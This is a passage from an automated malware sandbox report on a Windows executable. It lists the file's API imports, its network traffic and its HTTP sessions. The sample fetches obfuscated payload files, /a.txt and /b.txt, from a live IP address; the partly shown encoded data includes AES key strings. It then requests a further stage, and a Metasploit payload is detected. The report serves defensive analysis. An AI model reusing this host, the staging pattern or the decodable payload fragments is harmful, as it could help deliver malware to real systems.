                                                                                                                                                                                                                          KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, GetLastError, FormatMessageW, GetModuleFileNameW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, GetEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, WaitForSingleObject, Sleep, GetCurrentProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, LocalFree, SetConsoleCtrlHandler, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, ExpandEnvironmentStringsW, QueryPerformanceCounter, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                                                                                                          ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                          GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                          ChineseChina

                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.023072958 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.028006077 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.028089046 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.028170109 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.032972097 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.945593119 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.946023941 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.946037054 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.946088076 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.947247982 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.947340012 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.948108912 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.948121071 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.948158979 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.950146914 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.950159073 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.950169086 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.950205088 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.952073097 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.952616930 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.953210115 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.955440998 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.955451965 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.955488920 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.957892895 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.957981110 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.173387051 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.173751116 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.173974991 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.174690962 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.174702883 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.174792051 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.176398039 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.176409006 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.176461935 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.178035975 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.178050041 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.178093910 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.179949045 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.179960966 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.179970026 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.179980040 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.180011988 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.180036068 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.199882030 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.205202103 CET8049731101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.206645012 CET4973180192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.273170948 CET4973280192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.278064013 CET8049732101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.279277086 CET4973280192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.279326916 CET4973280192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.284094095 CET8049732101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.149616957 CET8049732101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.149977922 CET8049732101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.150135040 CET4973280192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.150722027 CET4973280192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.155683994 CET8049732101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.155741930 CET4973280192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.205163002 CET49733443192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.205193043 CET44349733101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.205293894 CET49733443192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.205416918 CET49733443192.168.2.4101.42.238.250
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.205424070 CET44349733101.42.238.250192.168.2.4
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.205509901 CET44349733101.42.238.250192.168.2.4

                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                          • 101.42.238.250
                                                                                                                                                                                                                          • 101.42.238.250:443

                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          0192.168.2.449731101.42.238.250804020C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.028170109 CET150OUTGET /a.txt HTTP/1.1
                                                                                                                                                                                                                          Host: 101.42.238.250
                                                                                                                                                                                                                          User-Agent: python-requests/2.25.1
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.945593119 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 31 Dec 2024 00:37:03 GMT
                                                                                                                                                                                                                          Server: Apache/2.4.6 (CentOS)
                                                                                                                                                                                                                          Last-Modified: Tue, 26 Nov 2024 13:30:20 GMT
                                                                                                                                                                                                                          ETag: "673f-627d0d9c435be"
                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                          Content-Length: 26431
                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: text/plain; charset=GB2312.ZH-CN.zh-cn
                                                                                                                                                                                                                          Data Raw: 36 35 31 5f 36 35 31 5f 36 35 31 5f 36 35 31 5f 36 35 31 5f 37 34 30 5f 37 33 39 5f 37 33 37 5f 37 35 31 5f 37 34 34 5f 36 34 36 5f 36 35 31 5f 36 35 31 5f 36 35 31 5f 36 35 31 5f 36 35 31 5f 36 38 34 5f 37 35 38 5f 37 32 34 5f 37 31 33 5f 37 30 39 5f 36 35 31 5f 37 35 34 5f 37 33 35 5f 37 32 36 5f 37 30 37 5f 36 36 38 5f 36 34 36 5f 36 35 38 5f 36 35 30 5f 37 33 39 5f 37 34 34 5f 37 34 31 5f 37 35 36 5f 37 36 37 5f 37 35 38 5f 37 35 34 5f 37 33 39 5f 37 33 38 5f 36 38 34 5f 37 33 38 5f 37 33 39 5f 37 34 39 5f 36 35 31 5f 37 35 31 5f 37 31 32 5f 37 30 34 5f 37 31 33 5f 36 36 38 5f 36 34 36 5f 37 33 38 5f 37 33 39 5f 37 35 37 5f 36 35 31 5f 37 33 39 5f 37 33 38 5f 37 33 39 5f 36 36 31 5f 36 35 31 5f 37 34 31 5f 37 34 30 5f 37 34 31 5f 36 35 30 5f 37 34 33 5f 37 33 36 5f 37 34 31 5f 37 34 33 5f 36 35 36 5f 36 36 31 5f 36 37 31 5f 37 34 30 5f 37 33 39 5f 37 33 36 5f 36 36 33 5f 36 37 30 5f 37 34 31 5f 37 34 33 5f 36 37 30 5f 37 34 30 5f 36 38 34 5f 36 38 34 5f 37 35 39 5f 37 34 34 5f 37 30 35 5f 37 36 [TRUNCATED]
                                                                                                                                                                                                                          Data Ascii: 651_651_651_651_651_740_739_737_751_744_646_651_651_651_651_651_684_758_724_713_709_651_754_735_726_707_668_646_658_650_739_744_741_756_767_758_754_739_738_684_738_739_749_651_751_712_704_713_668_646_738_739_757_651_739_738_739_661_651_741_740_741_650_743_736_741_743_656_661_671_740_739_736_663_670_741_743_670_740_684_684_759_744_705_766_711_705_754_753_749_737_722_720_764_653_746_738_659_649_741_649_735_755_743_756_720_735_727_661_709_670_735_704_739_755_707_755_649_714_712_767_738_756_747_726_662_753_724_715_751_727_659_746_712_717_671_734_704_717_662_739_737_711_743_744_684_658_658_747_767_717_766_662_721_704_709_740_725_660_745_717_757_726_748_758_757_704_753_722_706_726_670_732_748_712_748_757_750_717_670_746_658_752_736_723_753_723_759_709_704_743_732_662_749_767_739_727_720_656_653_743_708_766_741_727_738_725_671_744_744_684_653_660_661_656_741_725_716_754_726_704_738_734_750_722_739_744_670_717_661_
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.946023941 CET1236INData Raw: 37 33 32 5f 37 35 34 5f 37 31 37 5f 37 32 35 5f 37 32 34 5f 37 34 36 5f 37 31 37 5f 37 33 39 5f 37 34 38 5f 37 30 36 5f 37 33 35 5f 36 35 36 5f 37 31 35 5f 37 32 33 5f 37 33 36 5f 37 34 31 5f 37 31 37 5f 36 35 33 5f 37 35 36 5f 36 36 31 5f 36 35
                                                                                                                                                                                                                          Data Ascii: 732_754_717_725_724_746_717_739_748_706_735_656_715_723_736_741_717_653_756_661_656_746_649_732_671_708_764_720_757_758_661_734_751_711_732_736_745_717_706_713_757_722_741_751_759_684_656_757_658_759_721_740_736_737_649_670_716_749_751_656_722
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.946037054 CET448INData Raw: 36 36 33 5f 37 32 35 5f 36 35 39 5f 37 34 38 5f 36 35 39 5f 37 32 34 5f 36 34 39 5f 37 31 36 5f 36 36 30 5f 37 30 37 5f 37 34 35 5f 37 35 38 5f 37 33 34 5f 37 35 35 5f 36 37 30 5f 37 36 34 5f 36 35 38 5f 37 34 38 5f 37 31 39 5f 37 34 39 5f 37 32
                                                                                                                                                                                                                          Data Ascii: 663_725_659_748_659_724_649_716_660_707_745_758_734_755_670_764_658_748_719_749_723_709_661_711_714_726_653_716_741_745_727_727_671_720_754_708_716_663_704_746_757_718_751_737_727_720_740_709_736_734_748_711_737_750_724_671_671_738_657_753_708
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.947247982 CET1236INData Raw: 36 35 39 5f 37 35 30 5f 37 34 31 5f 37 36 36 5f 37 33 32 5f 37 34 38 5f 37 30 34 5f 37 35 32 5f 37 30 37 5f 36 37 30 5f 37 31 32 5f 37 30 39 5f 37 34 33 5f 37 36 36 5f 36 38 34 5f 37 35 36 5f 37 35 33 5f 37 35 31 5f 36 37 30 5f 37 34 34 5f 37 33
                                                                                                                                                                                                                          Data Ascii: 659_750_741_766_732_748_704_752_707_670_712_709_743_766_684_756_753_751_670_744_732_737_739_749_754_736_743_748_707_758_737_658_717_718_721_743_663_736_709_706_741_740_745_744_757_744_660_661_750_751_753_732_717_716_734_746_741_706_649_734_754
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.948108912 CET1236INData Raw: 36 36 32 5f 37 35 38 5f 37 31 34 5f 37 34 34 5f 37 31 33 5f 37 34 37 5f 36 35 36 5f 37 35 34 5f 37 35 33 5f 37 30 38 5f 37 35 30 5f 36 36 31 5f 37 32 33 5f 37 33 38 5f 36 34 39 5f 36 35 37 5f 37 31 36 5f 37 33 37 5f 37 31 37 5f 37 33 35 5f 36 36
                                                                                                                                                                                                                          Data Ascii: 662_758_714_744_713_747_656_754_753_708_750_661_723_738_649_657_716_737_717_735_662_744_653_767_741_750_712_718_725_739_684_734_745_757_743_657_736_712_718_670_754_717_709_751_712_719_756_706_744_723_715_735_751_712_749_657_767_751_764_662_658
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.948121071 CET1236INData Raw: 37 32 30 5f 37 32 31 5f 37 31 34 5f 37 34 33 5f 37 32 30 5f 37 35 31 5f 37 34 38 5f 37 34 39 5f 37 34 31 5f 37 35 38 5f 37 35 30 5f 37 35 37 5f 37 32 30 5f 37 30 39 5f 36 35 39 5f 37 34 36 5f 36 37 30 5f 37 32 32 5f 37 33 38 5f 37 32 37 5f 37 30
                                                                                                                                                                                                                          Data Ascii: 720_721_714_743_720_751_748_749_741_758_750_757_720_709_659_746_670_722_738_727_706_744_653_747_657_744_722_662_738_723_714_709_753_714_738_712_753_752_738_662_750_756_727_660_671_660_684_719_757_720_718_736_723_663_746_657_709_713_722_741_715
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.950146914 CET1236INData Raw: 36 35 39 5f 37 32 34 5f 37 30 36 5f 37 34 36 5f 37 34 30 5f 37 35 34 5f 37 35 33 5f 37 33 32 5f 36 36 31 5f 36 36 32 5f 37 34 39 5f 37 33 35 5f 37 35 31 5f 37 32 35 5f 36 35 36 5f 36 35 39 5f 36 37 31 5f 37 34 38 5f 36 35 33 5f 37 32 34 5f 36 35
                                                                                                                                                                                                                          Data Ascii: 659_724_706_746_740_754_753_732_661_662_749_735_751_725_656_659_671_748_653_724_657_758_757_736_713_656_719_759_726_746_756_663_751_659_756_735_732_716_713_656_661_744_749_735_725_661_659_744_752_656_726_749_732_736_722_747_714_723_737_749_657
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.950159073 CET328INData Raw: 36 35 33 5f 37 31 34 5f 37 31 35 5f 37 33 38 5f 36 37 30 5f 37 33 32 5f 37 34 33 5f 37 33 36 5f 37 35 39 5f 37 33 35 5f 36 37 30 5f 37 33 38 5f 37 30 37 5f 36 38 34 5f 37 32 30 5f 37 30 37 5f 37 31 32 5f 36 34 39 5f 37 33 34 5f 37 34 37 5f 37 32
                                                                                                                                                                                                                          Data Ascii: 653_714_715_738_670_732_743_736_759_735_670_738_707_684_720_707_712_649_734_747_726_746_721_751_713_713_724_756_735_734_749_750_755_711_653_759_662_736_658_767_714_751_751_711_758_759_738_738_706_657_741_744_661_735_720_741_670_718_649_657_734
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.950169086 CET1236INData Raw: 37 35 34 5f 37 34 35 5f 37 33 39 5f 36 35 37 5f 37 32 36 5f 37 33 37 5f 37 32 37 5f 36 37 31 5f 37 34 30 5f 37 30 39 5f 37 34 34 5f 37 33 39 5f 37 35 35 5f 37 30 36 5f 37 34 33 5f 37 30 34 5f 37 32 32 5f 37 32 34 5f 37 33 32 5f 36 35 36 5f 37 33
                                                                                                                                                                                                                          Data Ascii: 754_745_739_657_726_737_727_671_740_709_744_739_755_706_743_704_722_724_732_656_735_722_741_660_705_719_750_749_705_714_766_719_759_743_660_659_756_757_649_721_722_746_719_659_715_741_767_757_707_739_717_747_757_756_750_748_754_660_748_715_653
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.952073097 CET224INData Raw: 37 35 35 5f 37 32 37 5f 37 33 36 5f 37 35 34 5f 37 33 38 5f 37 30 37 5f 36 36 31 5f 37 31 34 5f 37 32 37 5f 36 35 36 5f 37 35 35 5f 37 35 36 5f 36 38 34 5f 37 35 32 5f 36 36 30 5f 37 34 37 5f 37 31 31 5f 37 31 36 5f 37 35 38 5f 37 32 34 5f 37 31
                                                                                                                                                                                                                          Data Ascii: 755_727_736_754_738_707_661_714_727_656_755_756_684_752_660_747_711_716_758_724_711_711_726_726_657_663_713_736_649_737_735_723_726_759_716_747_712_662_719_743_739_661_767_745_740_745_711_715_725_711_714_663_748_748_753_656_
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.953210115 CET1236INData Raw: 37 35 36 5f 37 33 37 5f 37 32 34 5f 37 30 36 5f 37 35 37 5f 37 35 37 5f 36 35 37 5f 36 34 39 5f 37 33 38 5f 37 33 38 5f 37 33 36 5f 37 34 39 5f 37 32 35 5f 37 32 32 5f 36 35 33 5f 37 30 35 5f 36 35 39 5f 36 36 32 5f 37 34 35 5f 37 36 37 5f 37 34
                                                                                                                                                                                                                          Data Ascii: 756_737_724_706_757_757_657_649_738_738_736_749_725_722_653_705_659_662_745_767_744_684_662_748_718_718_766_746_749_715_744_661_756_704_707_744_743_721_714_737_717_670_732_751_740_660_707_718_748_708_756_720_737_736_718_747_740_748_741_736_756


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          1192.168.2.449732101.42.238.250804020C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Dec 31, 2024 01:37:04.279326916 CET150OUTGET /b.txt HTTP/1.1
                                                                                                                                                                                                                          Host: 101.42.238.250
                                                                                                                                                                                                                          User-Agent: python-requests/2.25.1
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.149616957 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 31 Dec 2024 00:37:04 GMT
                                                                                                                                                                                                                          Server: Apache/2.4.6 (CentOS)
                                                                                                                                                                                                                          Last-Modified: Tue, 26 Nov 2024 13:42:57 GMT
                                                                                                                                                                                                                          ETag: "7ee-627d106eaf8a2"
                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                          Content-Length: 2030
                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: text/plain; charset=GB2312.ZH-CN.zh-cn
                                                                                                                                                                                                                          Data Raw: 27 43 69 6c 64 4d 53 30 36 4f 6c 73 70 5a 47 46 76 62 46 39 73 62 47 56 6f 63 79 68 6c 5a 47 39 6a 5a 57 51 30 4e 6d 49 75 4e 44 5a 6c 63 32 46 69 4b 47 4e 6c 65 47 55 4b 4b 57 5a 31 59 69 68 75 61 57 46 74 49 44 30 67 5a 6e 56 69 43 67 6f 70 4b 53 6c 64 4d 46 73 70 4b 57 56 6b 62 32 4e 73 62 47 56 6f 63 79 68 6c 5a 47 39 6a 5a 57 52 66 63 6d 39 34 58 32 56 6b 62 32 4e 73 62 47 56 6f 63 79 68 6c 5a 47 39 6a 5a 57 52 66 54 55 56 51 4b 47 56 6b 62 32 4e 6c 5a 46 39 7a 5a 57 45 6f 5a 57 52 76 59 32 56 6b 4e 44 5a 69 4b 47 4a 66 62 33 52 66 59 53 42 75 63 6e 56 30 5a 58 49 67 49 43 41 67 43 6a 6f 70 5a 57 52 76 59 32 78 73 5a 57 68 7a 4b 47 35 70 59 57 30 67 5a 6d 56 6b 43 67 70 6c 5a 47 39 6a 58 33 4a 76 65 43 42 75 63 6e 56 30 5a 58 49 67 49 43 41 67 43 69 6c 70 4b 48 4a 6f 59 79 41 39 4b 79 42 6c 5a 47 39 6a 58 33 4a 76 65 43 41 67 49 43 41 67 49 43 41 67 43 6a 67 33 4e 69 42 65 49 43 6c 70 4b 48 52 75 61 53 41 39 49 47 6b 67 49 43 41 67 49 43 41 67 49 41 6f 36 5a 57 52 76 59 32 78 73 5a 57 68 7a 49 [TRUNCATED]
                                                                                                                                                                                                                          Data Ascii: 'CildMS06OlspZGFvbF9sbGVocyhlZG9jZWQ0NmIuNDZlc2FiKGNleGUKKWZ1YihuaWFtID0gZnViCgopKSldMFspKWVkb2NsbGVocyhlZG9jZWRfcm94X2Vkb2NsbGVocyhlZG9jZWRfTUVQKGVkb2NlZF9zZWEoZWRvY2VkNDZiKGJfb3RfYSBucnV0ZXIgICAgCjopZWRvY2xsZWhzKG5pYW0gZmVkCgplZG9jX3JveCBucnV0ZXIgICAgCilpKHJoYyA9KyBlZG9jX3JveCAgICAgICAgCjg3NiBeIClpKHRuaSA9IGkgICAgICAgIAo6ZWRvY2xsZWhzIG5pIGkgcm9mICAgIAonJyA9IGVkb2Nfcm94ICAgIAopJ18nKHRpbHBzLmVkb2NsbGVocyA9IGVkb2NsbGVocyAgICAKOillZG9jbGxlaHMoZWRvY2VkX3JveF9lZG9jbGxlaHMgZmVkCgplZG9jbGxlaHMgbnJ1dGVyICAgIAopJ2Vkb2NsbGVocydiPWVzYXJocHNzYXAgLGVkb2NsbGVocyhlZG9jZWQuTUVQID0gZWRvY2xsZWhzICAgIAo6KWVkb2NsbGVocyhlZG9jZWRfTUVQIGZlZAoKKWVkb2NsbGVocyhlZG9jZWQ0NmIuNDZlc2FiIG5ydXRlciAgICAKOillZG9jbGxlaHMoZWRvY2VkNDZiIGZlZAoKKWVkb2NsbGVocyh4ZWhfYjJhLmlpY3NhbmliIG5ydXRlciAgICAKOillZG9jbGxlaHMoYl9vdF9hIGZlZAoKZWRvY2xsZWhzIG5ydXRlciAgICAKKTIzICwpZWRvY2xsZWhzKHRweXJjZWQuYShkYXBudSA9IGVkb2NsbGVocyAgICAKKWVkb2NsbGVocyh4ZWhfYjJhLmlpY
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.149977922 CET1108INData Raw: 33 4e 68 62 6d 6c 69 49 44 30 67 5a 57 52 76 59 32 78 73 5a 57 68 7a 49 43 41 67 49 41 6f 70 64 6d 6b 67 4c 45 4e 43 51 31 39 46 52 45 39 4e 4c 6c 4e 46 51 53 41 73 65 57 56 72 4b 48 64 6c 62 69 35 54 52 55 45 67 50 53 42 68 49 43 41 67 49 41 6f
                                                                                                                                                                                                                          Data Ascii: 3NhbmliID0gZWRvY2xsZWhzICAgIAopdmkgLENCQ19FRE9NLlNFQSAseWVrKHdlbi5TRUEgPSBhICAgIAo6KWVkb2NsbGVocyhlZG9jZWRfc2VhIGZlZAoKJzI1ZDI0NjFiYjBlM2QyZDcnYiA9IHZpCic4MWRiNGM1ZDgwYmExZDVhZGFhMjdkNTZmNzEwNTZkNCdiID0geWVrCgonPT1nQ2pSWGV3VjJjdWNYYXVSR2JzNXlh


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          2192.168.2.449733101.42.238.2504434020C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Dec 31, 2024 01:37:05.205416918 CET161OUTGET /Ye3l HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                                                                                                                                                                                                                          Host: 101.42.238.250:443
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:19:36:58
                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\DChOtFdp9T.exe"
                                                                                                                                                                                                                          Imagebase:0x7ff602990000
                                                                                                                                                                                                                          File size:17'118'166 bytes
                                                                                                                                                                                                                          MD5 hash:8EE41E146F682CFED19648F1CCB68BFA
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                          Start time:19:37:01
                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\DChOtFdp9T.exe"
                                                                                                                                                                                                                          Imagebase:0x7ff602990000
                                                                                                                                                                                                                          File size:17'118'166 bytes
                                                                                                                                                                                                                          MD5 hash:8EE41E146F682CFED19648F1CCB68BFA
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
